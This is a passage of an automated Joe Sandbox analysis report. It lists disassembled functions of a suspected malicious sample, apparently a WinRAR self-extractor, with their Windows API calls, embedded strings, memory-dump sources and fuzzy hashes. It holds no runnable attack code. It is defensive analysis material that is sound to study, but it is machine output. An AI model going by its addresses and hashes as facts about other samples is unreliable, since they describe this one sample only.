                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877084
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
                                                                                                                                                                                                      • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                                                                                                    • Opcode ID: 2cded3dda93089f22b6a56d0fb8c809eacd68f5ed6d7ed60b3b879439921c413
                                                                                                                                                                                                    • Instruction ID: 5632ea7f56c0a5543d51cb1f8af3e9c3832902ec0a0dc210e4624a23f1b741c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cded3dda93089f22b6a56d0fb8c809eacd68f5ed6d7ed60b3b879439921c413
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 464107B1D087446AEF21E7788C82BEE736CFF15304F008455FA59E6186D674DA44C722
                                                                                                                                                                                                    Function 0088B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088B610
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0088B637
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0088B650
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0088B661
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0088B66A
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0088B67E
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0088B694
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                                                    • String ID: LICENSEDLG
                                                                                                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                                                                                                    • Opcode ID: 0d9332c8f56de6a052d7d87d9e5b7457a8ad99dd8c480be68a82ff5d96b39598
                                                                                                                                                                                                    • Instruction ID: d2810beb8d495ce7ec45fe3df6b808867cc806e50f853abe649ae76bba187ef2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d9332c8f56de6a052d7d87d9e5b7457a8ad99dd8c480be68a82ff5d96b39598
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7212732204219BBE611BF65EC49F3B3B7DFB96B40F050015F600E24A1EB629E01D732
                                                                                                                                                                                                    Function 0088FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B9A644FC,00000001,00000000,00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FD99
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE14
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0088FE1F
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0088FE48
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0088FE52
                                                                                                                                                                                                    • GetLastError.KERNEL32(80070057,B9A644FC,00000001,00000000,00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE57
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0088FE6A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE80
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0088FE93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                                                                                    • Opcode ID: 5087ad2fea6828b5041eeaaedce6bf22dd50cffe6b9cd9f373824efa50ff7290
                                                                                                                                                                                                    • Instruction ID: 3a44da3ef05ed6cc7cca44ae1f9f958703d132e206b99cfaaca8cdd39c2e181a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5087ad2fea6828b5041eeaaedce6bf22dd50cffe6b9cd9f373824efa50ff7290
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A41F971A00219ABDB10FF68CC45BAEBBA8FF49710F144239FA15EB652D7749900C7E5
                                                                                                                                                                                                    Function 0087AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                                                                                                    • Opcode ID: 62af7aa82faadb8bc87acd33392e3543c4ff951ce053397b275acd962ffe8666
                                                                                                                                                                                                    • Instruction ID: 0479cf32676450b93f891737480753b8a75a14dc30b394ef767ba0f7d21687a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62af7aa82faadb8bc87acd33392e3543c4ff951ce053397b275acd962ffe8666
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9718C71A00619AFEB14DFA4CC95AAEB7B9FF89310B044159F416E76A0CB30AD01CB60
                                                                                                                                                                                                    Function 00879382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00879387
                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008793AA
                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008793C9
                                                                                                                                                                                                      • Part of subcall function 0087C29A: _wcslen.LIBCMT ref: 0087C2A2
                                                                                                                                                                                                      • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00879465
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 008794D4
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00879514
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                                                                                                    • Opcode ID: d4f1f4e235ad32595e0ed51368dcb4dfbd5e2cf9ecf362d382594f83aeb1f0f6
                                                                                                                                                                                                    • Instruction ID: 503772ffb51ef97ed82e12eac13443870e569b5b927b230dada554ab191fc181
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4f1f4e235ad32595e0ed51368dcb4dfbd5e2cf9ecf362d382594f83aeb1f0f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741357190026866DF61EBA4CC45DDE737CFF55380F0088A5F68DE3156DA38CB898B61
                                                                                                                                                                                                    Function 00881218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 0088122E
                                                                                                                                                                                                      • Part of subcall function 0087B146: GetVersionExW.KERNEL32(?), ref: 0087B16B
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00881251
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00881263
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00881274
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881284
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881294
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008812CF
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 00881379
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                                                                                    • Opcode ID: 8e6a3af982f9dfe213b254f07f625a9978a6eebfe87dd968c7c8b30374d8d38c
                                                                                                                                                                                                    • Instruction ID: a522f53eb27029f07e8b8e334b71632af30c84b0c909ec7c2ebdc89706b6edef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6a3af982f9dfe213b254f07f625a9978a6eebfe87dd968c7c8b30374d8d38c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241E5B1508305AFD710EF65C88496BFBE9FB89714F00892EF596C2610E738E649CB62
                                                                                                                                                                                                    Function 00872210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00872536
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                                                                                                    • Opcode ID: 6883a4f113d0a6cbb9b6bf74d8cfe3989ca0c07fc3c969f38daab5fbac613246
                                                                                                                                                                                                    • Instruction ID: 43f2eb5c36574deda654b6d82a08863cc850431daddc121b4153b76c18c286a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6883a4f113d0a6cbb9b6bf74d8cfe3989ca0c07fc3c969f38daab5fbac613246
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F113716042409BDB25EF288495BBA7799FB90300F08857DED8EDB28BCB65C9498763
                                                                                                                                                                                                    Function 00889CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                                                                                                    • Opcode ID: 5ef2eaf5754a0c4c00646f6441d2930d6c35053473d7f5b525a4afbe810f450f
                                                                                                                                                                                                    • Instruction ID: b375b202fdf512d3c04801ca47f703329d9472d0bd80c177159cae901ee2885f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ef2eaf5754a0c4c00646f6441d2930d6c35053473d7f5b525a4afbe810f450f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE51266674032395DB30BA29981177673E4FFA1790F6D042AFDC1DB2C1FBA58C818369
                                                                                                                                                                                                    Function 0089F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089FE02,00000000,00000000,00000000,00000000,00000000,0089529F), ref: 0089F6CF
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0089F74A
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0089F765
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089F78B
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0089FE02,00000000,?,?,?,?,?,?,?,?,?,0089FE02,00000000), ref: 0089F7AA
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0089FE02,00000000,?,?,?,?,?,?,?,?,?,0089FE02,00000000), ref: 0089F7E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                    • Opcode ID: ed8c8a164c2bdf35e0dc740724ef2b7bdd52c698de9c0bfbf069719eeca5f85c
                                                                                                                                                                                                    • Instruction ID: 2db243462a5c8a98a17710ec3ac4a2129f54d68b9f61fe57a6f563b5f1a3c97a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed8c8a164c2bdf35e0dc740724ef2b7bdd52c698de9c0bfbf069719eeca5f85c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F451A4B1900249AFDF14DFA8DC45AEEFBF4FF09300F18416AE655E7252D630AA41CBA1
                                                                                                                                                                                                    Function 00892900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00892937
                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0089293F
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 008929C8
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 008929F3
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00892A48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                    • Opcode ID: 9885c6efad136d0ff52a2c7515adc084f65395bd0da6f2c07f096ad7477a7742
                                                                                                                                                                                                    • Instruction ID: 9ab293f59086ae97aaefb920aafdc6cb209f47855c0d21e8230036d2480e5c78
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9885c6efad136d0ff52a2c7515adc084f65395bd0da6f2c07f096ad7477a7742
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9419F34A00218AFCF10EF68C885A9EBFF5FF45324F188165E815EB792D7319A45CB91
                                                                                                                                                                                                    Function 00889ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00889EEE
                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00889F44
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00889FDB
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00889FE3
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00889FF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                                                                                                    • Opcode ID: b264a32295b48559c1add431aac318faa754eac3995d6e20d975237b39fb1c5d
                                                                                                                                                                                                    • Instruction ID: 855865e3ea6291d3419ab672e3cc80eb30ac776ba1afaf722c039f049cc8c8f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b264a32295b48559c1add431aac318faa754eac3995d6e20d975237b39fb1c5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6741D131005311EFDB256F68DC48B2B7BA8FF48701F04465AF949DA156CB34DA04CB62
                                                                                                                                                                                                    Function 00889955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
